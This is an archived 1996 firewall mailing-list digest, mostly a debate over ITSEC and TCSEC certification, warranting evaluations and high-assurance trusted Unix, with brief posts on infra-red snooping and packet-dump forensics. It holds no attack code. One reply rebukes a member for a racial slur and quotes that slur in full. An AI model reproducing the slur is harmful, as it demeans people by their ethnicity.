detected by the CLEF (or by NSA, since we are also in B2 eval). (2) The site violated the conditions necessary to provide virus prevention. (3) The claim was valid to the E4/B2 level of assurance, but no (current :-) system is perfect, and some flaw not detectable by the current analysis and proof methods exists in the product. (4) We introduced an error in the product after certification. So, how do you determine which of the above four reasons was the cause? And what do you do about it? What if a real loss of a ton o' money resulted? What do you do about it? These are difficult questions to answer. One way is to pay a ton o' money for the product if you want the warrantee, and the company and/or CLEF get insurance. ANother way is to punt on the whole issue. [SNIP] > In terms of arguing which OS is the most secure, thats a false > position. A certificate only states how well a product performed > under test against one set of conditions. It provides a reasonably > level playing field in that all B1 certified products met the same > minimum standards, but it doesnt necessarily show that some B1 > products also do other things which make them more suitable for some > risk management requirements. And the truth of the mattr is that the TCSEC is based on what was doable 15 years or more ago. It doesn't deal with several classes of threats, such as viruses and administrators. (Administrator's are responsible for 75% of all security volations - instentional and unintentional - yet they are considered a part of the TCB by the TCSEC and the ITSEC.) Our system adresses these issues, which appears as a claim in the ITSEC certificate, but not the TCSEC eval. So it is sometimes very difficult to rate systems. And I agree that we have an issue regarding "most secure." As you indicate, it all depends upon your threat profile. [SNIP] > > Thats fine and there are many trusted OS around covering from C2 > upwards. If you insist on a definition of UNIX as 'based on AT&T > source code etc.', it could be argued that no UNIX can exceeed > F-B2/E4. A purist may also argue that even that is not a true UNIX > and F-B1/E3 is the limit. Well, we, of course, are the exception to the rule. BVut we wrote our kernel from scratch to be high assurance. We are in at E4. And don't tell my CEO, but there is no reason that we or our CLEF can see which would prevent us for going E5 or E6. In fact, ... (he just walked in, so I'll stop talking about this now! :-) > > There is also the argument that the OS flavour and UNIX-like > qualities are irrelevant in building special duty systems like > firewalls which do not need to mount typical general purpose computer > applications and do not need to host many direct users (depends what > you are trying to achieve, but a trusted barrier system requires 3 > direct users normally and everyone else is an indirect user in > transit). There is some merit in this argument and a typical firewall > implementation may well include some devices which not only dont > employ a trusted OS but dont use UNIX either. Unix is an API. "Trust" is basically the quality of tghe underlying mechanisms. There is absolutely no reason why you can't put - say - an NT API in our OS and look like NT, and be certifiable. (Hmmmmmm - "certifiable" takes on a new meaning here! :-) I think that it is an error to confuse the two. I think that for most people, "UNIX" means AT&T source base UNIX. In that case, I agree with the above assessment. IUn fact, I do not think that you can go above B1 with such a source base, without a complete rewrite, in which case it is no longer that source base. > > Many of the arguments by MS fanatics in favour of NT etc., hinge on a > belief that Bill Gates couldnt possibly produce a product with > defects. The main argument in favour of UNIX, other than some people > already use it and are familiar with the calls and screens, is that a > trusted system developer can obtain source code and carefully > re-engineer the OS to remove the standard looney tune features that a > common UNIX has. A problem with this is commercial acceptance. The OS will not be successful unless it runs standard applications transparently. But that's another discussion! > > Trying to do that with something like NT is vastly more difficult not > because the products present technology difficulties, but because of > the way Microsoft trades and reluctantly makes partial source code > available to outsiders after considerable difficulties. You don't need source code to implement the NT API. > [SNIP] > > There is already a very wide selection of B1/B1+ UNIX OS available, > the majority of which depend on SecureWare technology to achieve the > assurance. They achieve the same advantages as untrusted UNIX in > terms of application portability and most are highly configurable. And at least one B2/E4 system (well, really in B2 and E4 eval system), and that is Data General's commercial Unix system. [SNIP] > > When someone claims to know everything about an OS, I really do begin > to wonder. That rare animal may exist and be worth his weight in gold > several times over. Even the owners of UNIX (or most other OS) find > large areas of product which they really dont understand any more, > and probably didnt understand that well at the time the code was > cut, but they leave alone to save time and money. If a competent > engineer went through a typical UNIX and stripped out those chunks of > code which do nothing for him, the end product would look very small. At B2 and E4, **ALL** code that is even referenced to administer the system is evaluated and must meet strict standards of architecture, design, documentation, implementation, and testing, as well as exactly match the user and administrative documentation. This is not the case at B1 and below or E3 and below. That is why B2 and E4 are the minimum levels at whcih the term "high asurance" can apply (IMHO), and why we did such a system. It's the only way we could honestly state that we truly believe that the system works as we say it works (with the warning that there are undiscovered flaws in the system, but no one has yet discovered them using a very rigorous process - yet they do exist). > > One of the things which a trusted UNIX developer has to do is to pull > the starting product apart and understand what each piece does, > remove the nasty bits, and add some code to develop the requirement > functionality. He also has to document everything in a way which > would make many developers faint. > > The primary reason for difficulty in taking UNIX above F-B1/E3 is > that you are still left with some areas which cant be fully > documented back to origination because of the way the product was > originally developed and documented. Its not impossible and the > re-engineering tool kit developed under the Armadillo One > specification went a long way to addressing the issues, but its still > very expensive to do and requires a great deal of highly skilled > labour at computer scientist rather than computer engineer level. That is why we wrote it from scratch, with stringent software engineering methods. [SNIP] > > Although there are several issues I dont agree with in the higher > levels of TCSEC and ITSEC, international networking and electronic > trading require a level of risk reduction which demands capabilities > beyond F-B2/E4. The point can be argued, but a good B1+ product > already addresses a number of key areas such as trusted path and > trusted audit beyond B3. There is the question of whether customers > are prepared to pay for that and many people probably enjoy playing > roulette with their organisation's future. I agree completely, EXCEPT that the ITSEC does not talk about functionality. The E4 level of assurance is the minimum necessary to accomplish what you want, I think. The feature set must be extended (as we have done) to accomplish the rest (so long as all of it is E4 or greater). > > It could be that the way forward will mean that UNIX, as it stands > today, is inappropriate and that we should go back to basics, decide > what the real benefits of UNIX are and then incorporate them in a new > open OS environment. If we do that there is no reason why we cant > build an OS which performs even beyond the levels described at A1, > and we may need to do that. Hmmmmmm - A1 assurance is not trivial. We need to develop some new formal tools, I think, before those levels can be reached. In fact, just to make our B2 system commercial (i.e., meaning that it comes out at the same time as our standard unix system, and is in sync with the standard system) required that we invent new methodologies and formal methods to deal with issues such as least privilege and covert channels. (And anyone who thinks that covert channels don't affect the average system simply doesn't yet understand the manner in which covert channels can be exploited.) [SNIP] > > In the meantime we have to live with what we have. Waiting for Bill > Gates to deliver NT2121 with every possible functionality you could > ever ask for ( and a promise that all the bugs will be removed by > NT3030), in an environment where Bill claims you cant even build a > dishwasher without bundling NT with the washing powder, means that > you either believe in immortality, or you are thinking of a better > world for your great great great grandchildren and praying the world > is still around then. I think that a different and definitely achievable goal is that you have a B2/E4 system that runs shrink-wrapped NT apps unmodified, but provides REAL security and protection from the real threats faced by the organization, and is at least as easy to administer as NT is. > Ian J-B. > > Thanks for your comments, Ian. ================================ Jon F. Spencer spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj) Data General Corp. Phone : (919)248-6246 62 T.W. Alexander Dr, MS #119 FAX : (919)248-6108 Research Triangle Park, NC 27709 Office RTP 121/9 Reality is an illusion - perception is what counts. No success can compensate for failure at home. President David O. McKay ***** UCC 1-207 ******** From firewalls-owner Sat Feb 10 19:53:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA12233 for firewalls-outgoing; Sat, 10 Feb 1996 18:54:01 -0800 (PST) Received: from vent.pipex.net (vent.pipex.net [158.43.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA16643 for ; Sat, 10 Feb 1996 07:49:43 -0800 (PST) Received: from unknown by vent.pipex.net (8.6.12/PIPEX simple 1.20) id PAA26274; Sat, 10 Feb 1996 15:48:46 GMT Message-ID: In-Reply-To: <9602091847.AA09066@tsgops.rtp.dg.com> References: Conversation with last message <9602091847.AA09066@tsgops.rtp.dg.com> To: Firewall List MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: Most Secure Unix? Date: Sat, 10 Feb 96 15:54:54 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk and Jon Spencer responded further > [SNIP] > > Ian writes in response to Rolf, who wrote in repsonse to me, ... > > > I would have been much happier if ITSEC Scheme Body Secretariats > > warranted the certificates which they issue. It is a point which I > > have regularly raised from the first working parties on the drafting > > and adoption of ITSEC. Unfortunately, the Scheme Body Secretariats > > are staffed by government employees who are reluctant to put their > > money where their mouth is. > > As someone who is currently in E4 eval with a greater than F/B2 Unix product > I have thought about this issue of "warranteeing" such a certification. > What would the warrantee provide protection from? What omissions are > OK and which ones are not OK? This would be a barrister's dream! I would settle initially for a warrantee of the evaluation which is theoretically what the certificate is. The legal situation is a minefield because information technology is developing very much faster than legislation. In the case of ITSEC, the national scheme bodies are responsible for licensing the CLEFs and for issuing the certificates. Thats all very worthy and its a big advance on previous attempts at producing a criteria envirnment which aims to serve all information users. The national scheme bodies are supposed to be drafting specific agreements so that an evaluation in Germany, or the UK, or where ever, is formally accepted in any other ITSEC subscribing country. So far the only agreement is between UK and Germany to cover evaluations in either country. There are protocols between several countries including some which do not publically acknowledge ITSEC and the technical agreement between Germany and UK was drafted very quickly. What has presented major challenges is reaching agreement on legal wording of agreements. Now that UK and Germany have produced a legal agreement, it should be much easier for all the other countries because there is a model to work from. To move from there, every scheme body could warrant an evaluation, but would have to include, I believe, a copy of the vendor's TOE. That would mean that the scheme body accepts its implied responsibility as the regulating body licensing the CLEFs. That would not mean that they warrant the supply by a vendor or the application of the evaluated products by the user. Further actions would be needed to do that and there is no reason why a scheme body could or should accept responsibility for any actions outside the criteria definition and the evaluation/certification system. Where I believe this process is very important is in supporting the future development and use of applications. At present some countries' court systems will accept computer evidence and others will not. Right now no court should accept computer evidence because systems do not provide the necessary assurance to show that a particular system worked reliably at all times when data was transmitted, processed, accessed, or stored. There is multiple opportunity to manipulate data covertly. That relates directly to firewalls as well as other elements in electronic trading/information exchange. It is one major barrier to secure employment of EDI. Today corporations employing EDI have to set up their own legal tradng agreements and it wont be long before some of those agreements are tested in court and fail. Therefore criteria such as ITSEC potentially play a very much wider role in corporate risk control than just allowing a sysad to claim the the hole is not in his side of the boat, or giving senior management a warm feel. > > I think that reasonable people can come to an understanding on these issues. > However, there are some very complicated issues. For example, our claim > of "virus prevention" has been accepted by the UK ITSEC folks as an > evaluatable claim. Note that this is the first time at any level that they > have accepted ANY virus-related claim. So we make some statements about > what must be true for this to be effective. ITSEC theoretically provides for every possible risk condition to be evaluated and reported. However, functionality like encryption and virus checking have generally been excluded for several reasons, not least that other government agencies declare proprietary interest over the national scheme bodies. >If a virus does indeed get into > the system, there are (at least) four possibilities as to how it happenned: > (1) Our virus prevention claim was made in error, but that error was not > detected by the CLEF (or by NSA, since we are also in B2 eval). I firmly believe that the evaluators should accept responsibility for their evaluation. If the vendor makes a false claim or a simple mistake, the whole purpose of evaluation is to identify this. What ITSEC really needs (or any other succeeding criteria) is a CLEF Inspectorate with the powers to apply sanctions and remove licenses. It also requires the will to enforce those sanctions. The original UK CLEFs did a good job. They made mistakes in the early days because they were still learning. I know of at least one certified product which had a very serious hole not picked up by the CLEF. However, those original CLEFs have become much more efficient and capable. The main problem may be with a dramatic increase in the number of CLEFs. At least one ITSEC country is talking about licensing 120 CLEFs. Not every national scheme body will monitor CLEFs as effectively as others. That suggests the need for an international CLEF inspectorate. One important feature of the ITSEC concept was that the evaluation facilities would not constrict the market demand through insufficient funded capacity. This addresses a primary weakness of TCSEC where evaluation ca[acity frequently was inadequate, creating a queue of products awaiting evaluation. However, if the numbers of CLEFs were to dramatically increase, monitoring their performance also needs an expansion in inspectorate capacity and funding. >(2) The> site violated the conditions necessary to provide virus >prevention. Virus prevention/killing can present particular problems, but a user really needs both a risk policy and an accreditation system rather than hoping a firewall built of B1 (or whatever level) elements is adequate. Thats not a whole lot different from vehicles. A manufacturer should accept responsibility for designing a safe and reliable vehicle which will perform all of the tasks claimed for it. However, if a user decides not to learn to drive correctly, or does something really stupid, that should not be the responsibility of the vendor. > (3) The claim was valid to the E4/B2 level of assurance, but no (current :-) > system is perfect, and some flaw not detectable by the current analysis and > proof methods exists in the product. Thats true of any system and why you never have 100% risk reduction. ITSEC goes a long way to addressing this issue because the vendor provides a TOE against which the product is measured. As the criteria is employed on more and more products and higher levels are routinely measured that system improves. It probably also calls for still further tightening of documentation and is claimed as the justification for employing formal methods widely, not just to the higher levels of assurance. (4) We introduced an error in the > product after certification. Would that not be a later unevaluated version? ITSEC still doesnt have a RAMP system like TCSEC. Thats has advantages and also dangers because some vendors do have v.1.0. certified and then only sell v.2.X versions, but still claiming they are certified product. I think the responsibility is with the vendor to tell the customer that v.1.0 has been evaluated and certified but he is trying to sell v.2.x which has changes. TCSEC was hampered by rigid adherence to exact detailed configurations and RAMP. That meant that if you wanted a certified product you had to employ dated products which many customers dont want to do. I think the answer is to allow choice. Those who want certified versions should be able to get them but those who want later functionality/versions should understand what they are buying. > > So, how do you determine which of the above four reasons was the cause? > And what do you do about it? What if a real loss of a ton o' money resulted? > What do you do about it? > > These are difficult questions to answer. One way is to pay a ton o' money > for the product if you want the warrantee, and the company and/or CLEF > get insurance. ANother way is to punt on the whole issue. > > [SNIP] > > > In terms of arguing which OS is the most secure, thats a false > > position. A certificate only states how well a product performed > > under test against one set of conditions. It provides a reasonably > > level playing field in that all B1 certified products met the same > > minimum standards, but it doesnt necessarily show that some B1 > > products also do other things which make them more suitable for some > > risk management requirements. > > And the truth of the mattr is that the TCSEC is based on what was doable > 15 years or more ago. It doesn't deal with several classes of threats, such > as viruses and administrators. (Administrator's are responsible for 75% of > all security volations - instentional and unintentional - yet they are > considered a part of the TCB by the TCSEC and the ITSEC.) Our system adresses > these issues, which appears as a claim in the ITSEC certificate, but not the > TCSEC eval. So it is sometimes very difficult to rate systems. > > And I agree that we have an issue regarding "most secure." As you indicate, > it all depends upon your threat profile. Agreed, but there is also the matter of accreditation and enforcement. All the criterias attempt to cover some aspects which really ought to be dealt with as site issues under system accreditation. That raises several other important issues. Most users dont have any real form of risk policy. Most of the few that do have weak policies because there is no enterprise policy tying all the the objectives and tasks together and linking the many elements of the enterprise. Thats part of the false comfort with firewalls. So many people actually use the firewall approach to avoid giving adequate consideration to risk management. > > [SNIP] > > > > Thats fine and there are many trusted OS around covering from C2 > > upwards. If you insist on a definition of UNIX as 'based on AT&T > > source code etc.', it could be argued that no UNIX can exceeed > > F-B2/E4. A purist may also argue that even that is not a true UNIX > > and F-B1/E3 is the limit. > > Well, we, of course, are the exception to the rule. BVut we wrote our > kernel from scratch to be high assurance. We are in at E4. And don't > tell my CEO, but there is no reason that we or our CLEF can see which > would prevent us for going E5 or E6. In fact, ... (he just walked in, so > I'll stop talking about this now! :-) That covers one challenge of evaluations. There are several products which could achieve higher than E3 without modification. However, evaluation costs money. If most users dont even understand the basic benefits of truste systems, the market gets dramatically smaller with each level up the chain. As some vendors have discovered the hard way, having a high assurance and a good product can meant marketing failure even though that product may not be significantly more costly than a much lower level assurance. The result is that a development team may find that in achieving say E3, they have to do many things to their product which leads to a major rework along the lines of DG-UX. When they finish, they may have a product which could be presented for say E6. The bean counters look at the CLEF quote for an E6 evaluation and the very much lower cost of E3 and fight hard to force down the evaluation target to say money. Marketing looks at it and sees 2 problems. An E6 evaluation may greatly extend the time to certification so losing sales to folk who want E2 or E3 today. The other thing they see is that most of their market thinks it wants E2 but could economically be sold onto E3. Marketing and finance together also look at the sale price and the gross margins which again encourages a lower target. A driving factor has to be customer demand and funding. If every user demanded, and was prepared to pay for, products which were well engineered and supported, most of today's products would not be on the market. The reality is that most customers dont approach their requirements that way, often because of lack of knowledge, but also because they havent found out how to sell the benefits to the people who hold the gold in their enterprises. Of course thats not entirely a customer failing, but also a failing on the part of vendors to see the benefits, understand them and communicate them to the customers. > > > > > There is also the argument that the OS flavour and UNIX-like > > qualities are irrelevant in building special duty systems like > > firewalls which do not need to mount typical general purpose computer > > applications and do not need to host many direct users (depends what > > you are trying to achieve, but a trusted barrier system requires 3 > > direct users normally and everyone else is an indirect user in > > transit). There is some merit in this argument and a typical firewall > > implementation may well include some devices which not only dont > > employ a trusted OS but dont use UNIX either. > > Unix is an API. "Trust" is basically the quality of tghe underlying > mechanisms. There is absolutely no reason why you can't put - say - an > NT API in our OS and look like NT, and be certifiable. (Hmmmmmm - > "certifiable" takes on a new meaning here! :-) I think that it is an error > to confuse the two. I think that for most people, "UNIX" means AT&T source > base UNIX. In that case, I agree with the above assessment. IUn fact, I > do not think that you can go above B1 with such a source base, without a > complete rewrite, in which case it is no longer that source base. > > > > > Many of the arguments by MS fanatics in favour of NT etc., hinge on a > > belief that Bill Gates couldnt possibly produce a product with > > defects. The main argument in favour of UNIX, other than some people > > already use it and are familiar with the calls and screens, is that a > > trusted system developer can obtain source code and carefully > > re-engineer the OS to remove the standard looney tune features that a > > common UNIX has. > > A problem with this is commercial acceptance. The OS will not be successful > unless it runs standard applications transparently. But that's another > discussion! Agreed in general computing although it should not be an issue with something like a firewall which should not be running general applications. > > > > > Trying to do that with something like NT is vastly more difficult not > > because the products present technology difficulties, but because of > > the way Microsoft trades and reluctantly makes partial source code > > available to outsiders after considerable difficulties. > > You don't need source code to implement the NT API. Thats true but working on proprietary product in that way wont help you cover all of the issues. > > > > > [SNIP] > > > > > There is already a very wide selection of B1/B1+ UNIX OS available, > > the majority of which depend on SecureWare technology to achieve the > > assurance. They achieve the same advantages as untrusted UNIX in > > terms of application portability and most are highly configurable. > > And at least one B2/E4 system (well, really in B2 and E4 eval system), and > that is Data General's commercial Unix system. Yes and other products will enter eval at and above that level. In technical terms the arms race is on. In marketing terms it hasnt really started yet. > > [SNIP] > > > > When someone claims to know everything about an OS, I really do begin > > to wonder. That rare animal may exist and be worth his weight in gold > > several times over. Even the owners of UNIX (or most other OS) find > > large areas of product which they really dont understand any more, > > and probably didnt understand that well at the time the code was > > cut, but they leave alone to save time and money. If a competent > > engineer went through a typical UNIX and stripped out those chunks of > > code which do nothing for him, the end product would look very small. > > At B2 and E4, **ALL** code that is even referenced to administer the system > is evaluated and must meet strict standards of architecture, design, > documentation, implementation, and testing, as well as exactly match the > user and administrative documentation. This is not the case at B1 and below > or E3 and below. That is why B2 and E4 are the minimum levels at > whcih the term "high asurance" can apply (IMHO), and why we did such a > system. It's the only way we could honestly state that we truly believe > that the system works as we say it works (with the warning that there > are undiscovered flaws in the system, but no one has yet discovered them > using a very rigorous process - yet they do exist). In general I would agree with the basis of the argument, but recognise that some users will have requirements which can be met in other ways. The important thing for them to understand is what they need and why they need it rather than the crude desire to buy cheap products. > > > > > One of the things which a trusted UNIX developer has to do is to pull > > the starting product apart and understand what each piece does, > > remove the nasty bits, and add some code to develop the requirement > > functionality. He also has to document everything in a way which > > would make many developers faint. > > > > The primary reason for difficulty in taking UNIX above F-B1/E3 is > > that you are still left with some areas which cant be fully > > documented back to origination because of the way the product was > > originally developed and documented. Its not impossible and the > > re-engineering tool kit developed under the Armadillo One > > specification went a long way to addressing the issues, but its still > > very expensive to do and requires a great deal of highly skilled > > labour at computer scientist rather than computer engineer level. > > That is why we wrote it from scratch, with stringent software engineering > methods. Yes, it can have a lower cost and a shorter development cycle. However, many reasons, including commercial and marketing considerations, make re-engineering attractive for several product areas. For example, it would probably be much more successfull to re-engineer something like Word Perfect and upgrade the existing user base than to set up a new company and build a new product, even if an engineering approach would be better served by new engineering. > > [SNIP] > > > > Although there are several issues I dont agree with in the higher > > levels of TCSEC and ITSEC, international networking and electronic > > trading require a level of risk reduction which demands capabilities > > beyond F-B2/E4. The point can be argued, but a good B1+ product > > already addresses a number of key areas such as trusted path and > > trusted audit beyond B3. There is the question of whether customers > > are prepared to pay for that and many people probably enjoy playing > > roulette with their organisation's future. > > I agree completely, EXCEPT that the ITSEC does not talk about functionality. > The E4 level of assurance is the minimum necessary to accomplish what you > want, I think. The feature set must be extended (as we have done) to > accomplish the rest (so long as all of it is E4 or greater). > > > > > It could be that the way forward will mean that UNIX, as it stands > > today, is inappropriate and that we should go back to basics, decide > > what the real benefits of UNIX are and then incorporate them in a new > > open OS environment. If we do that there is no reason why we cant > > build an OS which performs even beyond the levels described at A1, > > and we may need to do that. > > Hmmmmmm - A1 assurance is not trivial. We need to develop some new > formal tools, I think, before those levels can be reached. > > In fact, just to make our B2 system commercial (i.e., meaning that it > comes out at the same time as our standard unix system, and is in sync > with the standard system) required that we invent new methodologies and > formal methods to deal with issues such as least privilege and covert > channels. (And anyone who thinks that covert channels don't affect the > average system simply doesn't yet understand the manner in which covert > channels can be exploited.) Moving from conventional to trusted development is a major step for a vendor and generally costly. Right now there is no shortage of methodologies and tools, but many of them are not at all well know and many are distinctly user unfriendly. Maybe one day every vendor will employ trusted development practices as standard and find that this actually reduces development costs after the initial culture shock. > > [SNIP] > > > > In the meantime we have to live with what we have. Waiting for Bill > > Gates to deliver NT2121 with every possible functionality you could > > ever ask for ( and a promise that all the bugs will be removed by > > NT3030), in an environment where Bill claims you cant even build a > > dishwasher without bundling NT with the washing powder, means that > > you either believe in immortality, or you are thinking of a better > > world for your great great great grandchildren and praying the world > > is still around then. > > I think that a different and definitely achievable goal is that you have > a B2/E4 system that runs shrink-wrapped NT apps unmodified, but provides > REAL security and protection from the real threats faced by the organization, > and is at least as easy to administer as NT is. > > > Ian J-B. > > > > > > Thanks for your comments, Ian. > My please and thanks for your responding comments. Ian J-B From firewalls-owner Sat Feb 10 21:28:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA17143 for firewalls-outgoing; Sat, 10 Feb 1996 21:23:28 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA17138 for ; Sat, 10 Feb 1996 21:23:23 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id XAA12143 for GreatCircle.COM!firewalls; Sat, 10 Feb 1996 23:18:35 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA22475; 10 Feb 96 23:44:49 CST (Sat) Received: by sonic.nmti.com; id AA04760; Sat, 10 Feb 1996 23:15:33 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602110515.AA04760@sonic.nmti.com.nmti.com> Subject: Re: Non-company Access ?? To: allyn@allyn.com (Mark Allyn) Date: Sat, 10 Feb 1996 23:15:33 -0600 (CST) Cc: ken@bridge.com, frankw@in.net, Dick_Wall@stratus.com, firewalls@GreatCircle.COM In-Reply-To: <199602100125.RAA25941@mark.allyn.com> from "Mark Allyn" at Feb 9, 96 05:25:36 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This can get mightly unwieldy. Where are you going to keep those > gigabytes of data? Let's say you splurge and spend $20/tape for super quality 120m DAT. That's $2.50/gigabyte compressed. Doesn't seem a problem to me. From firewalls-owner Sat Feb 10 21:55:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA17710 for firewalls-outgoing; Sat, 10 Feb 1996 21:40:03 -0800 (PST) Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA17705 for ; Sat, 10 Feb 1996 21:39:57 -0800 (PST) Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA198; Sun, 11 Feb 1996 00:39:02 -0500 Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF819.1D5FD300@rwcooper.RC.Toronto.on.ca>; Sun, 11 Feb 1996 00:37:25 -0500 Message-ID: <01BAF819.1D5FD300@rwcooper.RC.Toronto.on.ca> From: Russ To: "'Brosl Hasslacher'" Cc: "'Firewalls'" Subject: RE: Date: Sun, 11 Feb 1996 00:37:24 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I fail to see how making a derogatory racial slur in public in any way promotes your ideas or position. In case you hadn't noticed, in today's society, it simply shows how stupid, immature, and ignorant you are. These are hardly the qualities I would look for in someone I might consider listening to. As to the point of your message, its moot, I didn't get past the words "slanty-eyed chink". Cheers, Russ From firewalls-owner Sat Feb 10 23:09:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA20410 for firewalls-outgoing; Sat, 10 Feb 1996 22:55:12 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id WAA20404 for ; Sat, 10 Feb 1996 22:55:07 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id RAA17564; Sun, 11 Feb 1996 17:24:14 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA20914; Sun, 11 Feb 1996 17:24:12 +1030 Received: by mallee.awadi (SMI-8.6/SMI-SVR4) id RAA11640; Sun, 11 Feb 1996 17:24:10 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <199602110654.RAA11640@mallee.awadi> Subject: Re: 125 megabit infra-red To: frankel@yu1.yu.edu (Mervyn Frankel) Date: Sun, 11 Feb 1996 17:24:09 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Mervyn Frankel" at Feb 10, 96 10:07:42 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Mervyn Frankel: > >Infra-red offers security that other technologies do not, > Maybe, maybe not - I m sure that there is some spread in the IR beam which could be picked up by a snooper in the right position. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Sun Feb 11 05:10:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA05090 for firewalls-outgoing; Sun, 11 Feb 1996 05:02:31 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA05048 for ; Sun, 11 Feb 1996 05:02:21 -0800 (PST) Received: from maestro.Maestro.COM by relay2.UU.NET with SMTP id QQaclo04079; Sun, 11 Feb 1996 08:01:02 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA09503; Sun, 11 Feb 96 07:50:22 EST Date: Sun, 11 Feb 1996 07:50:21 -0500 (EST) From: Sick Puppy To: firewalls@count04.mry.scruznet.com Cc: firewalls@GreatCircle.COM Subject: Re: Hoo Dat? In-Reply-To: <199602102012.MAA03720@count04.mry.scruznet.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > the real tail :) is told by the raw packet dump and > doing forensics on that... BTW when I was Thanks for the advice. Will concentrate on getting a raw packet dump of attempted connects from the attacking domain. SP, tCED cDm From firewalls-owner Sun Feb 11 05:39:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA05909 for firewalls-outgoing; Sun, 11 Feb 1996 05:37:23 -0800 (PST) Received: from iez.com ([194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA05904 for ; Sun, 11 Feb 1996 05:37:14 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA09128; Sun, 11 Feb 1996 14:37:07 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma007332; Sun Feb 11 14:36:46 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA13182; Sun, 11 Feb 1996 14:33:02 +0100 Message-Id: <9602111333.AA13182@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA29458; Sun, 11 Feb 96 14:32:59 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA21938; Sun, 11 Feb 96 14:32:50 +0100 From: Rolf Weber Subject: Re: Most Secure Unix? To: ianj-b@dial.pipex.com (Ian Johnstone-Bryden) Date: Sun, 11 Feb 1996 14:32:49 +0100 (MEZ) Cc: firewalls@greatcircle.com (firewalls) In-Reply-To: from "Ian Johnstone-Bryden" at Feb 8, 96 05:43:36 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > > > > > I think perhaps my point wasn't made clearly. The firewall can > > only be as > > > good as the OS on which it exists. If your firewall is an > > application > > > on top of an OS, I can break the firewall by breaking the OS. > > > > > i never heard of any breakin possible because of a kernel bug. > > may be i'm wrong, may be it's possible, but i cannot imagine. > > You are wrong and, not only is it possible, its been done > well, my statement was a little bit fast written. a lot of nice people sent me informations about this SunOS bug. i heard of it, too, but not very much. may be it was exploited to break into hosts, may be even into firewalls, but that's not the point! the point is that the pure kernel is one of the strongest parts of the chain, at least not the weakest. it's a simple fact that every security system has to trust a few simple things (which could be buggy). it's the administrator's job to take care. no comments about the ITSEC etc. stuff. i would only repeat myself. i know too less about it, i don't care for it at all. i don't say it's worthless, but it's worthless for me, it's worthless for my security configuration and it's worthless for firewalls at all (that's, of course, just MHO). rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-113 | can't make me happy. From firewalls-owner Sun Feb 11 06:54:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA07798 for firewalls-outgoing; Sun, 11 Feb 1996 06:47:38 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA07793 for ; Sun, 11 Feb 1996 06:47:26 -0800 (PST) Received: from anubis.network.com by nsco.network.com (4.1/1.34) id AA07524; Sun, 11 Feb 96 08:49:07 CST Received: from beldar.network.com by anubis.network.com (4.1/SMI-4.1) id AA07236; Sun, 11 Feb 96 08:47:49 CST From: robp@anubis.network.com (Rob Peglar) Message-Id: 